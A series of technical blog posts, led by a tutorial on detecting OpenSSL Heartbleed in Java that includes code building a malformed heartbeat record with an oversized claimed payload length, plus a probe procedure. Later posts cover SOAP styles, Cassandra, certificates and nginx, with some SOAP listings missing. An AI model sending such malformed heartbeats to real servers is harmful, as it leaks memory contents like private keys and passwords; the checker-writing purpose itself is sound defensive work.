OpenSSL Heartbeat vulnerability – Heartbleed and Java, BouncyCastle, How to write a program to check

To check whether a particular web server runs a version of OpenSSL susceptible to "Heartbleed", one could use any of the plethora of free tests on the web, such as the ones linked from the Wikipedia article on the subject. I am the author of the Heartbleed test for Symantec SSL at: "".  Note: that codebase is completely different and follows a completely different approach from what I am going to release to the general public: sample code that demonstrates heartbeat requests with BouncyCastle.

However, if the server to be verified is not accessible from the outside, you would need to write your own tool or download one. There are quite a few in Python and Go, and even one that details the changes to be made to OpenSSL s_client in order to discover the vulnerability. Some of them work, some work only some of the time, and when they do not, one needs to understand why.

The following sections briefly explain the OpenSSL vulnerability, its fix, and how to write a checker of your own.

The vulnerability

An improper heartbeat (HB) request leads to a vulnerable web server leaking the contents of its memory. This content could be a secret key, its password, and so on.

While testing my HB tester program, I noticed attacks on my external-facing web server at a rate of 2 every 10 minutes. There are a lot of attacks going on at this time.

The HB request

The request is in the following format:

HB request => ContentType (1 byte) : TLS Version (2 bytes: major and minor) : Record Size (2 bytes) : Encrypted or not Encrypted bytes

An example in hex: 18 0303 00cc and then the encrypted or not encrypted HB message follows.


Encrypted or not Encrypted bytes => HB message Type : Payload Size : Payload : Padding

An example in hex for a non encrypted HB request message: 1 00cf and the actual payload and padding follow.

An improper HB request

An improper or attack-vector request carries a payload smaller than the size it declares in the "Payload Size" field. As simple as that.

An improper HB request to a vulnerable OpenSSL installation would result in it returning an HB response. The same request to a patched / not vulnerable OpenSSL (or any other web server that is not susceptible to HB) would result in a TLS alert.
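A minimal sketch of assembling the malformed record described above; the claimed payload length used here (0x4000) is just an illustrative value:

```java
import java.io.ByteArrayOutputStream;

public class HeartbeatRequest {
    // Builds a plaintext TLS heartbeat record whose claimed payload length
    // exceeds the payload actually carried (here: none) - the Heartbleed trigger.
    static byte[] malformedHeartbeat(int claimedLength) {
        ByteArrayOutputStream out = new ByteArrayOutputStream();
        out.write(0x18);                        // ContentType: heartbeat
        out.write(0x03);                        // TLS version: major
        out.write(0x03);                        // TLS version: minor (TLS 1.2)
        out.write(0x00);                        // record length: only the 3 bytes
        out.write(0x03);                        // of the HB message header follow
        out.write(0x01);                        // HB message type: request
        out.write((claimedLength >> 8) & 0xFF); // claimed payload length...
        out.write(claimedLength & 0xFF);        // ...but no payload follows
        return out.toByteArray();
    }

    public static void main(String[] args) {
        byte[] hb = malformedHeartbeat(0x4000);
        System.out.println(hb.length); // 8: record header (5) + HB header (3)
    }
}
```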

The vulnerability in a little more detail

The malformed message results in an affected OpenSSL version returning a payload of the size specified in the HB request, irrespective of the actual payload in the request. The affected OpenSSL version does not validate this, so the response payload is read from memory well past the request, leaking memory contents.

The patch

The patch tests the payload length specified in the request against the actual record length:

if (1 + 2 + payload + 16 > s->s3->rrec.length) return 0;
/* silently discard per RFC 6520 sec. 4 */

If the 1 byte that specifies the HB record type (request, in this case), plus the 2 bytes that specify the payload length, plus the specified payload size, plus the minimum size of the padding (16 bytes), is GREATER than the record length, then no HB response is returned.
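The same length check can be mirrored in a few lines of Java; a heartbeat is only answered when the claimed payload plus the fixed overhead fits inside the received record:

```java
public class HeartbeatCheck {
    // Mirrors the patched check: respond only when 1 byte of HB type,
    // 2 bytes of payload length, the claimed payload, and the minimum
    // 16 bytes of padding all fit inside the received record.
    static boolean shouldRespond(int claimedPayload, int recordLength) {
        return 1 + 2 + claimedPayload + 16 <= recordLength;
    }

    public static void main(String[] args) {
        System.out.println(shouldRespond(0xFFFF, 8)); // false: silently discarded
        System.out.println(shouldRespond(16, 35));    // true: 1+2+16+16 = 35 fits
    }
}
```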

Design of a program to test for this vulnerability using Java

  1. Create a Java Socket to the web server
  2. Get a sample of a TLS ClientHello from TCPDUMP (Use s_client to send in a HB request and capture the packets to get the sample) (Make sure that it has the Heartbeat Extension setup to allow for heartbeats).
  3. Write the TLS ClientHello bytes to the socket
  4. Read the ServerHello response bytes till the end
  5. Send in the malformed HB request (constructed as described above)
  6. Check the response: if it is not a TLS alert, then the web server is vulnerable. The server could also reset the connection or time out, and in these cases we can assume that the server is not vulnerable. However, there is an infinitesimal chance of a false negative, especially in the case of a connection timeout (with the server consequently certified not vulnerable): the timeout could be due to an actual connection issue. Note that to circumvent the Heartbleed issue, network administrators have deployed firewall rules that time out a heartbeat request – valid or not.
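The verdict in step 6 can be reduced to the ContentType byte of the first TLS record read back after the malformed heartbeat: 24 (0x18) is a heartbeat record, 21 (0x15) is a TLS alert. A sketch of that classification:

```java
public class HeartbleedVerdict {
    // Classifies the first TLS record ContentType read back after the
    // malformed heartbeat: 0x18 = heartbeat response (vulnerable),
    // 0x15 = TLS alert (patched). Anything else - including a reset or a
    // read timeout - is treated as inconclusive / likely not vulnerable.
    static String classify(int contentType) {
        if (contentType == 0x18) return "vulnerable";
        if (contentType == 0x15) return "not vulnerable (alert)";
        return "inconclusive";
    }

    public static void main(String[] args) {
        System.out.println(classify(0x18)); // vulnerable
        System.out.println(classify(0x15)); // not vulnerable (alert)
    }
}
```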

There are a huge number of types of web servers out there. The above steps would in all probability diagnose this vulnerability correctly on Apache and Nginx on Linux, but would fail with IBM HTTP Server or IIS. In such a scenario, one would parse the complete ServerHello, check whether it is an extended ServerHello, and if so, check for the existence of the heartbeat extension.

Also note that the SSL 3.0 specification does not allow an extended ClientHello or ServerHello, so the suggestion is to use a TLS 1.0 ClientHello in this case.
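The heartbeat extension has type 15 per RFC 6520; a sketch of scanning a ServerHello extensions block for it (each extension is framed as a 2-byte type, a 2-byte length, then the data):

```java
public class HeartbeatExtensionScan {
    // Walks a TLS extensions block (2-byte type, 2-byte length, data), as
    // found at the tail of an extended ServerHello, looking for the
    // heartbeat extension (type 15 per RFC 6520).
    static boolean hasHeartbeatExtension(byte[] ext) {
        int i = 0;
        while (i + 4 <= ext.length) {
            int type = ((ext[i] & 0xFF) << 8) | (ext[i + 1] & 0xFF);
            int len  = ((ext[i + 2] & 0xFF) << 8) | (ext[i + 3] & 0xFF);
            if (type == 15) return true;
            i += 4 + len;
        }
        return false;
    }

    public static void main(String[] args) {
        // heartbeat extension, length 1, mode 1 (peer allowed to send)
        byte[] ext = {0x00, 0x0F, 0x00, 0x01, 0x01};
        System.out.println(hasHeartbeatExtension(ext)); // true
    }
}
```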

The other alternative approach is to use BouncyCastle and send heartbeat requests after the TLS session has been established: check out TlsProtocolHandler. If I have time, I will post that piece of code for your perusal. As of now, I have experimented with BouncyCastle and have been successful in:

  • Establishing a TLS session
  • Sending in an encrypted "valid" TLS heartbeat request and receiving an encrypted heartbeat response.
  • Sending in an encrypted "invalid" TLS heartbeat request and receiving an encrypted heartbeat response if the server is vulnerable to Heartbleed. Otherwise, we receive an alert, a connection reset, or a socket read timeout, which points to a patched server or one unaffected by Heartbleed.

NB: It seems to me that a valid heartbeat request is only honored by OpenSSL after a TLS session has been established. I have tested (and you can test, either with s_client or your own tool, perhaps using BouncyCastle) sending a valid heartbeat request after establishing a TLS session: I established a valid TLS session, sent an encrypted heartbeat, and was able to elicit a heartbeat response using Java and BouncyCastle. I have not cleaned up the code yet and will post it once I do. So, empirically, it seems that even in broken OpenSSL versions, a valid heartbeat request sent right after ServerHelloDone is disallowed. That would be the reason a heartbeat response is not forthcoming for a valid heartbeat request sent before the TLS handshake is complete.

Happy testing.




Posted in Technical | Leave a comment

White Paper on RSA versus ECC Certificate Performance Analysis in SSL / TLS

The white paper that I led, and that earned an award at Symantec, is available to the public; you can get it here.

Not only does it explicate the empirical performance of SSL / TLS with these two types of certificates but it also provides an in depth overview of the protocol.

Posted in Technical | Leave a comment

SOAP and JAX-WS, RPC versus Document Web Services


I have had this buried on this web site for years and am publishing it on the blog as well.

This article takes a journey that ends with a clear and cogent elucidation of the differences between the various SOAP styles for web services: RPC Literal versus Document Literal versus Document Wrapped. We also talk about the WS-I Basic Profile that web services need to be compliant with in order to achieve interoperability with consumers on a different platform, technology stack, etc.

The article assumes familiarity with XML, WSDL, SOAP as well as Java (upwards of Java 5 including annotations). You can run any of the examples with JDK 1.6 without downloading any extensions or any other libraries.

With the advent of JDK 1.6, JAX-WS and JAXB support is intrinsically available without the need to download any new libraries since Metro is part of the JDK release now.

Without digressing, let's get down to the differences between the RPC and Document styles with respect to the Java codebase, the WSDL, and the SOAP requests and responses. For the purpose of this illustration, we create an example with a Java interface annotated with JAX-WS annotations to turn it into a web service, then generate the artifacts and detail the WSDL and the SOAP requests and responses so generated.

Note: the coverage extends to styles that are mandated by the WS-I BP 1.1 (Basic Profile for interoperability of web services).

We will use the bottom-up approach, wherein the Java interface is coded first and the WSDL is then generated off it.

Java classes are used for the purpose of illustrating the differences, and the WSDL and schema, as well as the SOAP requests and responses, are displayed to demonstrate the differences between the following SOAP styles:

  1. RPC Literal (Wrapped)
  2. Document Literal
  3. Document Wrapped

The following Java classes are used. They are listed in their entirety (except the package and import statements, for brevity), and any differences introduced for the different SOAP styles are highlighted in the relevant sections.

  1. MyServiceIF => this is the web service interface
  2. MyServiceImpl => this is the implementation of the MyServiceIF.
  3. HolderClass1 => this is the singular argument of the exposed web service operation
    • HolderClass2 => this is one of the instance variables of HolderClass1, besides a string and an integer.
  4. EndPointPublisher => as the name suggests, this publishes the web service and automatically generates the artifacts such as the WSDL.

Once the Java codebase, WSDL, schema, and SOAP request and response are outlined for each of the SOAP styles, a section explaining the various differences follows.

RPC Literal Wrapped

RPC Literal is always wrapped (never BARE). This is a listing of the Java classes mentioned earlier.

Java Listing





Listing 1: The Java codebase.

WSDL and Schema

The WSDL generated for RPC Literal is as follows:


The schema that this WSDL refers to is:


SOAP Request

RPC-Lit SOAP Request

SOAP Response


RPC-Lit SOAP Response


Document Literal (BARE)

The java codebase remains the same except for the following:

  1. The SOAP binding for MyServiceIF is updated to specify Document as the style: @SOAPBinding(style=Style.DOCUMENT, use=Use.LITERAL, parameterStyle=ParameterStyle.BARE)
  2. The WebParam annotation now specifies a partName as well. This is to elucidate where the partName ends up in the generated WSDL.
  3. WS-I BP 1.1 specifies that there should be only one child element in the SOAP body. Since this is a Document Literal (BARE) service, there is no element (such as the name of the operation) encapsulating all the parameters (such as class1 and intArg), so a method with more than one parameter would not be WS-I BP 1.1 compliant. JAX-WS therefore disallows it and emits this error:
    Exception in thread "main" runtime modeler error: SEI server.MyServiceImpl has method getHolderClass annotated as BARE but it has more than one parameter bound to body. This is invalid. Please annotate the method with annotation: @SOAPBinding(parameterStyle=SOAPBinding.ParameterStyle.WRAPPED)
    To overcome this issue and continue demonstrating this style, we remove one of the arguments from the method.

Java Listing


@SOAPBinding(style=Style.DOCUMENT, use=Use.LITERAL, parameterStyle=ParameterStyle.BARE)
public interface MyServiceIF {

    HolderClass1 getHolderClass(@WebParam(name="holderClass1Param", partName="holderClass1Param2") HolderClass1 class1);
}


WSDL and Schema

The WSDL so generated for this style is:

Doc Literal WSDL

And the schema that it refers to is:

Doc Literal Schema

SOAP Request

Doc Literal SOAP Request (envelope not reproduced; the bare part element in the body is qualified by the http://server/ namespace)

SOAP Response

Doc Literal SOAP Response (envelope not reproduced; the body carries the ns2:getHolderResponse element, qualified by the http://server/ namespace)

Document Literal Wrapped

The java codebase remains the same except for the following:

  1. The SOAP binding for MyServiceIF is updated to use the Wrapped parameter style: the parameterStyle attribute is removed from the SOAPBinding annotation, which implies the service is wrapped, "Wrapped" being the default for that attribute: @SOAPBinding(style=Style.DOCUMENT, use=Use.LITERAL)

Java Listing


WSDL and Schema

The WSDL so generated for this style is:

Doc Wrapped WSDL

And the schema that it refers to is:

Doc Wrapped Schema

SOAP Request

Doc Wrapped SOAP Request

SOAP Response

Doc Wrapped SOAP Response

Differences between the Styles

Request Message

  • RPC Literal (Wrapped): The operation name appears immediately after the soap:body. The operation name is specified by the binding:operation element in the binding section of the WSDL. The name attribute of the message:part follows immediately; it is not qualified by a namespace. Thereafter the names of the elements in the types section of the WSDL are specified.
  • Document Literal (BARE): The operation name is not specified in the request. The value specified by the element attribute of message:part is the first element following the soap:body; it is qualified by a namespace. Note that this value of the element attribute is actually the value of the name attribute of the schema element in the types section. Thereafter it is similar to RPC Literal in the way the names of the elements in the types section of the WSDL are specified.
  • Document Wrapped: It is similar to the Document Literal (BARE) style with one exception => the value of the "element" attribute in the message:part is defined to be the name of the operation. Therefore the name of the operation is part of the request, and it appears immediately after the soap:body. Thereafter it is similar to RPC Literal.

WS-I BP 1.1 Compliance

  • RPC Literal (Wrapped): It is WS-I BP 1.1 compliant even though there are many parts in the input message. This is because the first element after the soap:body is the name of the operation, which encapsulates it all.
  • Document Literal (BARE): Since it can have multiple parts immediately following the soap:body, it is not WS-I BP 1.1 compliant. To make it compliant, a wrapper needs to be defined, which implies that the web method can only have one argument. You could circumvent this requirement by defining the arguments to be part of the SOAP header instead of the body.
  • Document Wrapped: It is WS-I BP 1.1 compliant.

WSDL

  • RPC Literal (Wrapped): There can be many parts in the input message. The parts are always specified with a "type" attribute.
  • Document Literal (BARE): There can be many parts in the input message. The parts are always specified with an "element" attribute.
  • Document Wrapped: There is only one part in the input message. The part is always specified by an "element" attribute. This part is the entire message payload and is completely defined in the types section.


Posted in Technical | Leave a comment

Cassandra version 1.2 and Amazon EC2 MultiRegion replication and RandomPartitioner

This post explicates the configuration and deployment of a Cassandra v1.2 cluster across 2 Amazon EC2 regions – one EC2 instance in Oregon and the other in Virginia. Note that the instances form a single cluster that spans multiple Amazon regions. The "cassandra-stress" utility (bundled with Cassandra) is used to test the insertion of 1M records of 2KB each in one region, subsequently read from the other region.

Configuration of a 2 node cluster – one node in each region

One can extend the cluster to as many nodes as required based on the steps outlined herein to create a 2-node cluster. Please note that these steps are an enabler for creating a multi-region cluster of 'X' nodes where 'X' is, of course, greater than 2. :-) You would not want a 2-node cluster – much less 2 nodes spread across 2 regions.

  1. Download and unzip / untar the cassandra 1.2 binary.
  2. cd conf and open up cassandra.yaml for editing:

    cluster_name: 'GK Cluster' [Update the cluster name]
    num_tokens: [Keep this commented]
    initial_token: 0 [set this to 0 for the first node]
    partitioner: RandomPartitioner [Replace the default with this]
    data_file_directories: /fs/fs1/cassandra/data [See below for details]
    commitlog_directory: /fs/fs2/cassandra/commitlog [See below for details]
    saved_caches_directory: /fs/fs2/cassandra/saved_caches [See below for details]
    seeds: "X.X.X.X,Y.Y.Y.Y" [comma separate public IPs of EC2 instances - one for each region]
    listen_address: pri.pri.pri.pri [Private IP of this instance]
    broadcast_address: [Public IP of this instance]
    rpc_address: [Replace with this]
    endpoint_snitch: Ec2MultiRegionSnitch [Replace with this snitch]

    The data_file_directories and commitlog_directory should be on two different disks. If you are using the new hi1.4xlarge instance to host Cassandra nodes, there are 2 TB of local SSD storage. These 2 volumes need to be formatted (to ext4) and mounted; thereafter one can be used for the commit log and the other for data files. The initial_token is to be calculated using the "tools/bin/token-generator" tool. In our case, we have one node in each region. Please note that if we had multiple nodes in each region, each region should be partitioned as if it were its own distinct ring.
  3. Repeat the preceding configuration step on the other node in the other region.
  4. Start up both the nodes.
  5. Check the status of the ring on node tool:
    $ bin/nodetool ring
    Datacenter: us-east
    Replicas: 0
    Address         Rack        Status State   Load            Owns                Token                                       
    X.X.X.X         1a          Up     Normal  71.18 KB        50.00%              0                                           
    Datacenter: us-west-2
    Replicas: 0
    Address         Rack        Status State   Load            Owns                Token                                       
    Y.Y.Y.Y         2a          Up     Normal  43.18 KB        50.00%              169417178424467235000914166253263322299

This concludes the setup of the cluster spread across two Amazon regions.
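The initial_token values mentioned in step 2 aim for even spacing around the RandomPartitioner's 0..2^127 range. A minimal sketch of that calculation for a single ring of n nodes (the bundled token-generator additionally offsets tokens per datacenter, which this sketch omits):

```java
import java.math.BigInteger;

public class TokenGenerator {
    // Evenly spaced RandomPartitioner tokens for a ring of n nodes:
    // token_i = i * 2^127 / n.
    static BigInteger token(int i, int n) {
        return BigInteger.valueOf(2).pow(127)
                .multiply(BigInteger.valueOf(i))
                .divide(BigInteger.valueOf(n));
    }

    public static void main(String[] args) {
        System.out.println(token(0, 2)); // 0
        System.out.println(token(1, 2)); // 85070591730234615865843651857942052864
    }
}
```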

Replication across regions

To demonstrate the replication of data from one region to the other, we define a KeySpace with an RF (Replication Factor) of 2. Thus, there are 2 replicas for each column family in it – one in each region.

We can utilize the "cassandra-stress" utility, which is configurable to create KeySpaces, specify snitches, create a test payload of a given size, and so on. The following two steps delineate the usage and demonstrate replication across regions.

Step 1:

On one node, we run "cassandra-stress" to write to the cluster.

$ tools/bin/cassandra-stress -S 2048 -c 1 -e ONE  -n 1000000 -r -R NetworkTopologyStrategy --strategy-properties='us-east:1,us-west-2:1' -i 3
Created keyspaces. Sleeping 1s for propagation.

Here we write a million rows of size 2048 bytes with a consistency level of "ONE". We also specify that the KeySpace to be created (if the KeySpace that cassandra-stress utilizes does not exist, it creates it) should replicate across regions – "us-east:1" and "us-west-2:1". The one million rows are created in 59 seconds.

To check the number of keys inserted, run the following:

$ bin/nodetool cfstats | more
 Column Family: Standard1
                SSTable count: 2
                Space used (live): 2017340163
                Space used (total): 2017452629
                Number of Keys (estimate): 951424

The number of keys is close to one million – please note that this is an estimate.

Step 2:

At the other node, we read from the cluster.

$ tools/bin/cassandra-stress -o read -n 1000000

We see that one million keys are read in 50 seconds.

To check the number of keys on this node:

$ bin/nodetool cfstats | more
 Column Family: Standard1
                SSTable count: 2
                Space used (live): 2041994209
                Space used (total): 2042106846
                Number of Keys (estimate): 963072

Status of the ring after the write and read operations:

$ bin/nodetool ring
Note: Ownership information does not include topology; for complete information, specify a keyspace

Datacenter: us-east
Address         Rack        Status State   Load            Owns                Token                                       

X.X.X.X         1a          Up     Normal  1.88 GB         50.00%              0                                           

Datacenter: us-west-2
Address         Rack        Status State   Load            Owns                Token                                       

Y.Y.Y.Y         2a          Up     Normal  1.9 GB          50.00%              169417178424467235000914166253263322299
Posted in Technical | Tagged | 3 Comments

OpenSSL verify a certificate chain (chain verification and validation) using the “verify” command

In addition to verifying the chain through the "s_client" command, demonstrated earlier in the series, one can also use the "verify" command to do the same. It is easier when the certificate chain is not already installed on a web server (in that case we can use the verify option of the "s_client" command), or when it is a chain for client certificates.

In the following example, we have an end-entity client certificate (PEM encoded) in 1.pem and the intermediate certificate in 2.pem. The root self-signed CA certificate is in 3.pem. We are verifying the end-entity certificate (1.pem) with the intermediate CA certificate (2.pem).

$ openssl verify -verbose -purpose sslclient -CAfile 2.pem 1.pem
1.pem: C = US, CN = XXX, O = YYY
error 20 at 0 depth lookup:unable to get local issuer certificate

To delve deeper into the failure, we add the "issuer_checks" option to display all the checks taking place. We notice that the intermediate certificate does not have the "Certificate Signing" (keyCertSign) bit set, so the verification fails. We need to request an intermediate CA certificate with the right key usage bits. Please see "keyCertSign" in RFC 5280.

$ openssl verify -verbose -issuer_checks -purpose sslclient -CAfile 2.pem 1.pem
1.pem: C = US, CN = XXX, O = YYY
error 29 at 0 depth lookup:subject issuer mismatch
error 32 at 0 depth lookup:key usage does not include certificate signing
error 20 at 0 depth lookup:unable to get local issuer certificate


Posted in Technical | Tagged , , , | Leave a comment

X509 certificate and keyUsage

The keyUsage extension, as delineated in RFC 5280, specifies the purpose of the (public) key contained in the certificate.

For instance:

  1. “keyEncipherment” implies that the public key is used to encrypt private or secret keys.
  2. “digitalSignature” implies that the public key can be used to validate the digital signatures.
  3. "keyAgreement" implies that the public key is used for key agreement, as in the DH case. The key agreement algorithm could be ECDH (Elliptic Curve DH), where the public key of the end-entity certificate is an ECDH public key. The certificate could be signed by any normal CA – for example with its ECDSA or RSA private key. So in the case of an ECC certificate, or any certificate containing an ECC public key, one would find the same ECC public key being utilized for key agreement, as in the ECDH (not ECDHE) case. Note that ECDHE does not require this keyUsage bit to be set.

For the other bits in the keyUsage extension, please see the RFC.
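When checking these bits programmatically, java.security.cert.X509Certificate.getKeyUsage() returns a boolean array in the RFC 5280 bit order; a small sketch of that mapping:

```java
public class KeyUsageBits {
    // Bit order of the boolean[] returned by
    // java.security.cert.X509Certificate.getKeyUsage(),
    // matching the KeyUsage BIT STRING of RFC 5280 section 4.2.1.3.
    static final String[] NAMES = {
        "digitalSignature", "nonRepudiation", "keyEncipherment",
        "dataEncipherment", "keyAgreement", "keyCertSign",
        "cRLSign", "encipherOnly", "decipherOnly"
    };

    static String name(int bit) {
        return NAMES[bit];
    }

    public static void main(String[] args) {
        // A CA certificate that signs other certificates must assert bit 5.
        System.out.println(name(5)); // keyCertSign
    }
}
```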


Posted in Technical | Tagged | Leave a comment

What is the encoding of the SSL certificates on the wire and how is the certificate chain configured?

It is DER, and it follows the RFC for TLS v1.2. I opened up Wireshark, exported the raw bytes of one of the certificates in the chain transmitted by the server in the SSL / TLS "Certificate" message, decoded it, and validated the DER encoding. This was on an HTTPS connection to an Apache web server.

The other question that web server administrators and writers of server-certificate verification code need answered is the order of the certificates in the chain sent back by the web server. The RFC provides details on that as well: the sender's certificate must come first, followed by the certificate that certifies it, and so on.
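A minimal sketch of that ordering check, modeled here on (subject, issuer) name pairs — with real java.security.cert.X509Certificate objects one would compare getIssuerX500Principal() against the next certificate's getSubjectX500Principal():

```java
public class ChainOrder {
    // The sender's certificate comes first; each subsequent certificate
    // must certify (i.e. be the issuer of) the one before it.
    static boolean wellOrdered(String[][] chain) { // each row: {subject, issuer}
        for (int i = 0; i + 1 < chain.length; i++) {
            if (!chain[i][1].equals(chain[i + 1][0])) return false;
        }
        return true;
    }

    public static void main(String[] args) {
        String[][] chain = {
            {"CN=server", "CN=intermediate"},
            {"CN=intermediate", "CN=root"}
        };
        System.out.println(wellOrdered(chain)); // true
    }
}
```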

Posted in Technical | Tagged | Leave a comment

Nginx 1.2.x and installing Elliptic Curve Cryptography (ECC) support – installation on Linux (./configure options and build for SSL / TLS support and enable HTTPS)

As of this writing, and as far as I know, the pre-compiled nginx binaries for various platforms (RedHat / CentOS or other Linux variants) do not come with ECC support, so you would not be able to utilize ECC-based certificates (ECDHE key exchange or ECDSA authentication). The solution is to compile the Nginx source code against an OpenSSL version that has ECC support, such as OpenSSL 1.0.1c or 1.0.1e. As of this writing, 1.0.1c has a vulnerability (please see the OpenSSL web site for more details) and 1.0.1e is the recommended version.

Compared with compiling the Apache HTTPD web server, I found building Nginx simpler, since one only needs to specify the OpenSSL source and the Nginx build process takes care of building and linking to it.

After downloading Nginx source, run the following to check the options for configure:

./configure --help

This lists all the options that determine which modules to enable or disable, and the locations of dependencies such as OpenSSL if they are not in the obvious places.

Since we have downloaded the OpenSSL source (1.0.1x) with ECC support into a different folder, we need to specify that, so the configure invocation becomes:

./configure --prefix=/app/installs/nginx --with-http_ssl_module --with-openssl=/app/source/openssl/openssl-1.0.1c

This implies that nginx will be installed at “/app/installs/nginx” with the module to add SSL / TLS support and the location of the OpenSSL source is specified as well (this is where the OpenSSL source was extracted).

Thereafter run the following commands:

make

Switch to root if not already so, and:

make install

Uncomment the HTTPS / SSL sections from the Nginx configuration file and specify the certificates and you are all set.

To check the options for the nginx command line:

nginx -h

To start nginx, run the binary under the install prefix specified at the configure step:

/app/installs/nginx/sbin/nginx
If you get errors about PCRE at the configure stage or later (error messages replicated below), and you have previously installed it, update the LD_LIBRARY_PATH environment variable to include the library. If you do not have it installed, there is a section on this blog on installing PCRE: all one has to do is download the source and install it. Another approach is to install the PCRE development libraries. Both approaches are outlined below.

Error Message 1 (at configure time):

./configure: error: the HTTP rewrite module requires the PCRE library.
You can either disable the module by using --without-http_rewrite_module
option, or install the PCRE library into the system, or build the PCRE library
statically from the source with nginx by using --with-pcre= option.

Error Message 2 (later at run time):

nginx: error while loading shared libraries: cannot open shared object file: No such file or directory

Solution 1:

While configuring nginx, one can specify the location of the PCRE source (8.31 is the version that I used; it can be downloaded from the PCRE website) at the configure step:

./configure ..... ..... ... --with-pcre=/app/source/pcre/pcre-8.31

And repeat the “make, make install” steps as outlined earlier.

Solution 2:

Alternatively, if PCRE is already installed, simply point to it (you would need the development libraries):

$ yum search pcre
== Matched: pcre ==
opensips-regex.x86_64 : RegExp via PCRE library
pcre.i386 : Perl-compatible regular expression library
pcre.x86_64 : Perl-compatible regular expression library
pcre-devel.i386 : Development files for pcre
pcre-devel.x86_64 : Development files for pcre

Then install the development version:

$ yum install pcre-devel

Time to reconfigure and install Nginx:

$ ./configure ...... [same arguments as above]

A successful “./configure” would have something akin to this output:

$ ./configure .........
checking for OS
+ Linux 2.6.18-128.1.6.el5 x86_64
checking for C compiler ... found
+ using GNU C compiler
+ gcc version: 4.1.2 20080704 (Red Hat 4.1.2-44)
checking for gcc -pipe switch ... found
checking for gcc builtin atomic operations ... found
checking for C99 variadic macros ... found
checking for gcc variadic macros ... found
checking for unistd.h ... found
checking for inttypes.h ... found
checking for limits.h ... found
checking for sys/filio.h ... not found
checking for sys/param.h ... found
checking for sys/mount.h ... found
checking for sys/statvfs.h ... found
checking for crypt.h ... found
checking for Linux specific features
checking for epoll ... found
checking for sendfile() ... found
checking for sendfile64() ... found
checking for sys/prctl.h ... found
checking for prctl(PR_SET_DUMPABLE) ... found
checking for sched_setaffinity() ... found
checking for crypt_r() ... found
checking for sys/vfs.h ... found
checking for nobody group ... found
checking for poll() ... found
checking for /dev/poll ... not found
checking for kqueue ... not found
checking for crypt() ... not found
checking for crypt() in libcrypt ... found
checking for F_READAHEAD ... not found
checking for posix_fadvise() ... found
checking for O_DIRECT ... found
checking for F_NOCACHE ... not found
checking for directio() ... not found
checking for statfs() ... found
checking for statvfs() ... found
checking for dlopen() ... not found
checking for dlopen() in libdl ... found
checking for sched_yield() ... found
checking for SO_SETFIB ... not found
checking for SO_ACCEPTFILTER ... not found
checking for TCP_DEFER_ACCEPT ... found
checking for TCP_INFO ... not found
checking for accept4() ... not found
checking for int size ... 4 bytes
checking for long size ... 8 bytes
checking for long long size ... 8 bytes
checking for void * size ... 8 bytes
checking for uint64_t ... found
checking for sig_atomic_t ... found
checking for sig_atomic_t size ... 4 bytes
checking for socklen_t ... found
checking for in_addr_t ... found
checking for in_port_t ... found
checking for rlim_t ... found
checking for uintptr_t ... uintptr_t found
checking for system byte ordering ... little endian
checking for size_t size ... 8 bytes
checking for off_t size ... 8 bytes
checking for time_t size ... 8 bytes
checking for setproctitle() ... not found
checking for pread() ... found
checking for pwrite() ... found
checking for sys_nerr ... found
checking for localtime_r() ... found
checking for posix_memalign() ... found
checking for memalign() ... found
checking for mmap(MAP_ANON|MAP_SHARED) ... found
checking for mmap("/dev/zero", MAP_SHARED) ... found
checking for System V shared memory ... found
checking for POSIX semaphores ... not found
checking for POSIX semaphores in libpthread ... found
checking for struct msghdr.msg_control ... found
checking for ioctl(FIONBIO) ... found
checking for struct tm.tm_gmtoff ... found
checking for struct dirent.d_namlen ... not found
checking for struct dirent.d_type ... found
checking for sysconf(_SC_NPROCESSORS_ONLN) ... found
checking for openat(), fstatat() ... found
checking for getaddrinfo() ... found
checking for PCRE library ... found
checking for PCRE JIT support ... not found
checking for OpenSSL library ... found
checking for zlib library ... found
creating objs/Makefile

Configuration summary
+ using system PCRE library
+ using system OpenSSL library [or the source location]
+ md5: using OpenSSL library
+ sha1: using OpenSSL library
+ using system zlib library

nginx path prefix: “/app/…..”
nginx binary file: “/app/….”
nginx configuration prefix: “/app/…..”
nginx configuration file: “/app/…..”
nginx pid file: “/app/…/”
nginx error log file: “/app/…./logs/error.log”
nginx http access log file: “/app/…../logs/access.log”
nginx http client request body temporary files: “client_body_temp”
nginx http proxy temporary files: “proxy_temp”
nginx http fastcgi temporary files: “fastcgi_temp”
nginx http uwsgi temporary files: “uwsgi_temp”
nginx http scgi temporary files: “scgi_temp”

And then proceed with the make and make install.

Posted in Technical | Tagged | Leave a comment

JMeter (Java) and DNS and SSL and CRL and OCSP

While utilizing JMeter for some load testing of a web service over HTTPS, I wanted to confirm the external invocations being made by the program for OCSP, CRL, etc. The easiest way is to utilize the "strace" command to display the network system calls:

strace -f -s 1024 -e trace=network ./

[pid  7361] connect(86, {sa_family=AF_INET6, sin6_port=htons(443), inet_pton(AF_INET6, "::ffff:10.0.0.xx", &sin6_addr), sin6_flowinfo=0, sin6_scope_id=0}, 28) = 0
[pid  7361] getsockname(86, {sa_family=AF_INET6, sin6_port=htons(35606), inet_pton(AF_INET6, "::ffff:10.0.0.xx", &sin6_addr), sin6_flowinfo=0, sin6_scope_id=0}, [28]) = 0
[pid  7361] connect(87, {sa_family=AF_INET, sin_port=htons(53), sin_addr=inet_addr("10.0.0.xx")}, 16) = 0
[pid  7361] sendto(87, "\226q\1\0\0\1\0\0\0\0\0\0\00274\0010\0010\00210\7in-addr\4arpa\0\0\f\0\1", 40, MSG_NOSIGNAL, NULL, 0) = 40

The snippet above shows a DNS query to port 53 of the name server.
No OCSP calls are being made either; by default, all of that is disabled. To allow for OCSP calls and CRL checking, one needs to set the appropriate system properties.

A snippet to enable OCSP and CRL checking (com.sun.security.enableCRLDP is the standard JDK property for fetching CRLs from distribution points):
// params is an instance of PKIXParameters
params.setRevocationEnabled(true);
Security.setProperty("ocsp.enable", "true");
// for CRL checking via CRL distribution points
System.setProperty("com.sun.security.enableCRLDP", "true");

Posted in Technical | Leave a comment

RFC 5077: TLS Session Resumption without Server-Side State

If you view the output of ssldump and see evidence of SSL session resumption, especially when a session cache is not configured on the server, you might be perplexed. I was, and after a little investigation was able to attribute it to the implementation of RFC 5077.

Essentially, the client sends an empty SessionTicket extension to the server (in the ClientHello message), and the server responds with an empty one if it supports such resumption (in the ServerHello message). Later, after the computation of the "MasterSecret", the server encrypts it along with other session state, such as the cipher suite, into a "SessionTicket" and returns the "NewSessionTicket" message to the client right before the ChangeCipherSpec message.

The following is a screen shot of a “SessionTicket” message / packet from the server to the client captured on WireShark.

Posted in Technical | Leave a comment